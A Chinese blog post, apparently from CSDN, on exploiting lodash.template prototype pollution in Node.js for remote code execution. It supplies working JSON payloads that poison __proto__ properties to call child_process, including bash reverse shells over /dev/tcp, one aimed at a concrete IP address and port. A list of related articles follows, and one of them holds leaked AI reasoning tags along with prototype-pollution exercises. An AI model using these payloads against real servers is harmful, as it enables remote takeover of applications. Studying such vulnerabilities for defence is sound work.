[WEB/Nodejs]原型链污染中lodash的利用方法分析

最新推荐文章于 2025-10-06 06:12:17 发布
原创 最新推荐文章于 2025-10-06 06:12:17 发布 · 919 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web #nodejs

本文探讨了JavaScript中lodash库的template函数存在的原型链污染漏洞,详细解释了如何通过设置options对象的原型来控制sourceURL,进而利用Function构造器执行任意代码。payload示例展示了如何构造命令执行和反弹shell。同时,文章提到了防止此类攻击的方法,包括避免修改原型和正确处理用户输入。
lodash.template

显式的lodashs.merge存在原型链污染漏洞,为了对其进行利用,需要找到可以对原型进行修改的逻辑。

optionssourceURL

options是一个对象,sourceURL是通过下面的语句赋值的,options默认没有sourceURL属性,所以sourceURL默认也是为空。

var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';

给options的原型对象加一个sourceURL属性,那么我们就可以控制sourceURL的值。

Function

相关了解Function构造器(构造函数)

文档:构造函数EJS原型污染RCE分析

JS当中每个函数都是一个Fuction对象, (function(){}).constructor === Function

var person = { age:3 }
var myFunction = new Function("a", "return 1*a*this.age");
myFunction.apply(person,[2])
// return 1*a*this.age 即为functionBody,可以执行我们的代码。

sourceURL传递到了Function函数的第二个参数当中,此处可以

var result = attempt(function() {
    return Function(importsKeys, sourceURL + 'return ' + source)
      .apply(undefined, importsValues);
  });

通过构造chile_process.exec()就可以执行任意代码了

Payload

{"__proto__":
	{
        "query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/4567 0>&1\"')"
    }
}
// bash -c “cmd string” 执行一个命令·		
// 以上PAYLOAD将输出输入反弹到指定的主机端口

以上Payload会产生一个报错,可以使用以下Payload来排除,

{"__proto__":{"sourceURL":"\nreturn e=> {for (var a in {}) {delete Object.prototype[a];} return global.process.mainModule.constructor._load('child_process').execSync('id')}\n//"}}

当然除了常见命令以外,还能构造反弹Shell,因为并不是所有的原型链污染都存在明确的回显,

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/121.36.96.230/2333 0>&1\"');var __tmp2"}}
Lodash原型污染漏洞原理详解
ericalezl的博客
06-07 2562
JavaScript是一种基于原型的语言,每个对象都有一个原型对象,对象以其原型为模板,从原型继承方法和属性。原型对象也可能拥有原型,并从中继承方法和属性,这种关系被称为原型链。在这个例子中,p1是Person构造函数的一个实例,它拥有name和age属性,同时还有一个__proto__属性指向。原型污染是指攻击者通过某种手段修改JavaScript对象的原型(通常是),从而影响所有基于该原型的对象的行为。在Lodash的案例中,某些函数(如)未能正确处理特殊属性(如和__proto__
js原型链污染
ALe0721的博客
04-15 1378
在 JavaScript 里,对象是可以继承其他对象的属性和方法的,这种继承就是通过“原型(prototype)”实现的每个对象都有一个隐藏属性(可以通过__proto__访问),它指向另一个对象,这个被指向的对象就是“原型对象——prototype“。这些原型对象也可以有自己的原型——__proto__,层层向上直到一个对象的原型对象为null,于是就形成了一个“链条”结构~这条链子就叫做原型链(Prototype Chain)// 虽然没写这个方法,但可以调用!
前端安全——最新:lodash原型漏洞从发现到修复全过程
热门推荐
qq_34761385的博客
03-18 2万+
人生的精彩就在于你永远不知道惊喜和意外谁先来,又是一个平平无奇的早晨,我收到了一份意外的惊喜——前端某项目出现lodash依赖原型污染漏洞。咋一听,很新奇。再仔细一看,呕吼,更加好奇了~然后就是了解和修补漏洞之旅。最后的最后,却发现其实这个漏洞修复起来很简单。但是我的整个过程却是充满曲折和离奇。特此记录一下。
Node.js后端效率倍增:lodash实战技巧7例
最新发布
gitblog_00914的博客
10-06 809
你是否还在为嵌套对象访问写三层判断?频繁处理数组数据时重复编写过滤逻辑?本文精选7个lodash实战技巧,基于[lodash v5.0.0](https://link.gitcode.com/i/9e042b94302036ddd3474a51dc0b679c)源码实现,帮你消除80%的重复代码,提升Node.js后端开发效率。读完本文你将掌握:安全数据访问、高频请求控制、高效数据转换等核心场景的...
jQuery和lodash导致原型污染的安全问题
Mybells
04-09 1834
jQuery jquery3.4.0(3.4.0及以后版本已修复)之前版本中extend函数会导致原型污染。 let a = $.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}')) console.log({}.devMode); // jquery3.4.0版本前会输出true 解决方法:在遍历对象时,当遇见 __p...
渗透攻击漏洞——原型链污染
qq_44640313的博客
10-24 2083
简单认识原型链污染
【5天打卡】学习Lodash的第四天——安全漏洞学习
happy921212的博客
04-27 2260
避免原型污染有以下几种方法,JQuery的安全漏洞了解,Lodash的安全漏洞等……
Nodejs原型链污染
apple_74953689的博客
07-28 711
在攻防世界和CTF比赛中见过几道Nodejs原型链污染的题目,发现这是一个常考点,不得不整理了。首先解释一下原型链
nodejs原型链污染基础
qq_63928796的博客
02-06 900
原型链污染是一种针对JavaScript运行时的注入攻击。通过原型链污染,攻击者可能控制对象属性的默认值。这允许攻击者篡改应用程序的逻辑,还可能导致拒绝服务,或者在极端情况下,远程执行代码。比较出名的一个原型链污染漏洞,是在2019年初,在Snyk的安全研究人员透露出流行的JavaScript库—Lodash的严重的漏洞,这允许黑客攻击多个web应用程序。漏洞细节:https://security.snyk.io/vuln/SNYK-JS-LODASH-450202。
CTFshow-WEB入门-node.js
feng的博客
04-01 3050
前言 刚学了2天的node.js,我还是太菜了官方文档看的太懵,听学长说node.js的漏洞就那些,不用那么专注的学习。但是考虑到我对于javascript和node.js都实在不太懂,因此打算一遍做题,一遍学node.js的基础知识。 web334 主要关注这段代码: var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item
ctfshow nodejs wp
yink12138的博客
01-12 493
ctfshow nodejs部分的wp
JavaScript原型链污染攻击
BerL1n
07-18 7579
在理解攻击方法之前先了解一下js的面向对象编程的特点。 由于js非常面向对象的编程特性,js有很多神奇的操作。 在js中你可以用各种方式操作自己的对象。 0x01 prototype和__proto__分别是什么? JavaScript中,我们如果要定义一个类,需要以定义“构造函数”的方式来定义: function Foo() { this.bar = 1 } new Foo() ...
高性能的JavaScript库---Lodash
weixin_34356138的博客
05-13 334
上周在仿做Nodejs社区的时候,遇到了lodash这个javascript库,很惭愧,那也是我第一次听说lodash。人嘛,对于新鲜的事物总是会或多或少感到些好奇的,于是就毫不犹豫地去lodash官网逛了逛......咦...这货我怎么感觉在哪儿见过?......额,尼玛这不就是underscore吗?难道是升级版?于是接着各种百度,google......先在这里简单总结一下吧! ...
JS原型、原型链以及原型链污染学习
2301_79469341的博客
11-25 1602
JavaScript 的原型与原型链是语言的核心机制,决定了对象属性的继承与访问方式。通过原型链,对象可以沿着其隐式原型 (__proto__) 一层层向上查找,直至 null,从而实现动态的继承关系。虽然这一机制功能强大,但也带来了潜在的安全隐患——原型链污染。 核心知识与特性 __proto__、prototype 与 constructor __proto__ 是对象的隐式原型,指向其构造函数的显式原型 (prototype)。 prototype 是函数独有的属性,定义了实例共享的属性和方法
最新:Lodash 严重安全漏洞背后你不得不知道的 JavaScript 知识
bdfcfff77fa的博客
01-23 2441
通过分析 lodash 的漏洞,以及解决方案,我们了解了原型污染的方方面面。Object 原型原型、原型链NodeJS 相关问题Object.create 方法Object.freeze 方法Map 数据结构深拷贝以及其他问题这么来看,全是基础知识。也正是基础,构成了前端知识体系的方方面面。
node.js之lodash介绍
code_better的博客
07-18 9080
lodash是一个具有一致接口、模块化、高性能等特性的javascript工具库,是underscore.js的fork,其最初目标也是“一致的跨浏览器行为。。。,并改善性能”。 lodash采用延迟计算,意味着我们的链式方法在显式或者隐式的value()调用之前是不会执行的,因此lodash可以进行shortcut(捷径) fusion(融合)这样的优化,通过合并链式大大降低迭代的次数,从而大
JavaScript原型链污染学习记录
蚁景网安学院
05-05 4187
NodeJS原型机制,比较官方的定义:我们创建的每个函数都有一个 prototype(原型)属性,这个属性是一个指针,指向一个对象,而这个对象的用途是包含可以由特定类型的所有实例共享的属性和方法
复现原型链污染
weixin_64623293的博客
08-07 625
是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法2.一个对象的__proto__属性,指向这个对象所在的类的prototype属性对于对象son,在调用。
nodejs原型链污染题目
04-03
<think>好的,用户想了解Node.js中的原型链污染练习题及解决方案。首先,我需要回顾原型链污染的基本概念,确保自己理解正确。原型链污染通常发生在JavaScript对象继承过程中,当攻击者能够控制对象的原型属性时,可能导致意外的属性覆盖或代码执行。 接下来,我需要设计几个典型的练习题。第一个例子可能是通过合并对象来修改原型,比如使用`Object.assign`或类似方法,如果未正确过滤参数,可能导致`__proto__`被修改。第二个例子可以利用模板引擎的漏洞,例如用户输入中包含恶意对象,影响模板的行为。第三个例子可以是修改全局对象的原型,比如污染`Object.prototype`,导致所有对象都受到影响。 然后,每个练习题需要给出具体的代码示例和解决方案。例如,在合并对象时,应该避免将用户输入直接合并到目标对象,或者使用`Object.create(null)`创建无原型的对象。对于模板引擎,应确保传入的数据是纯净的,不包含原型属性。全局污染的情况则需要检查是否有属性被添加到原型中,并在代码中进行防护。 还要考虑用户可能需要的相关引用。已有的引用[1]、[2]、[3]虽然主要关于事件循环、Promise和调试,可能不太相关,但或许可以在解决方案中提到调试方法时引用[3]。不过,可能用户提供的引用中没有直接关于原型链污染的内容,所以需要自行组织信息,确保解决方案准确。 最后,生成相关问题,帮助用户进一步学习,比如如何预防原型链污染、实际案例或相关工具。需要确保问题与主题紧密相关,并引导用户深入理解。</think>### Node.js原型链污染练习题及解决方案 --- #### **基础概念** 原型链污染是指通过修改对象原型链上的属性,影响所有继承该原型的对象[^1]。攻击者可能通过特殊构造的输入改变程序行为,常见于对象属性合并、模板渲染等场景。 --- ### **练习题1:对象合并污染** ```javascript function merge(target, source) { for (let key in source) { if (typeof target[key] === 'object' && typeof source[key] === 'object') { merge(target[key], source[key]); } else { target[key] = source[key]; } } } const userInput = JSON.parse('{"__proto__":{"isAdmin":true}}'); const config = { role: 'guest' }; merge(config, userInput); console.log({}.isAdmin); // 输出结果是什么?为什么? ``` **解决方案**: 1. **问题分析**:通过`__proto__`属性污染`Object.prototype`,导致所有对象继承`isAdmin: true`。 2. **修复方法**: ```javascript function safeMerge(target, source) { if (source.hasOwnProperty('__proto__')) return; // 过滤原型属性 // 其余代码同上 } ``` **或** 使用`Object.create(null)`创建无原型的对象。 --- ### **练习题2:模板引擎漏洞** ```javascript const templateEngine = (input) => { const template = `Welcome ${input.name}!`; return template; }; const maliciousInput = { name: 'Alice', __proto__: { toString: () => 'Hacked!' } }; console.log(templateEngine(maliciousInput)); // 输出结果如何被篡改? ``` **解决方案**: 1. **问题分析**:污染`Object.prototype.toString`方法,导致模板输出异常。 2. **修复方法**: ```javascript const sanitizedInput = JSON.parse(JSON.stringify(input)); // 深拷贝剥离原型链 const template = `Welcome ${sanitizedInput.name}!`; ``` --- ### **练习题3:全局污染检测** ```javascript function processData(data) { if (data.isValid) { // 业务逻辑 } } const payload = '{"__proto__":{"isValid":true}}'; const parsedData = JSON.parse(payload); processData(parsedData); console.log({}.isValid); // 输出结果?如何防御? ``` **解决方案**: 1. **问题分析**:通过污染`Object.prototype`,所有空对象都会继承`isValid: true`。 2. **修复方法**: - 使用`Object.hasOwnProperty`检查属性: ```javascript if (Object.hasOwnProperty.call(data, 'isValid')) { // 业务逻辑 } ``` - 使用`Object.freeze(Object.prototype)`禁止修改原型。 --- #### **防御原则** 1. **避免直接操作`__proto__`**:使用`Object.getPrototypeOf()`替代。 2. **深拷贝时过滤原型属性**:如使用`lodash.cloneDeepWith`定制拷贝逻辑。 3. **安全的数据处理**:对用户输入进行严格过滤和类型检查[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值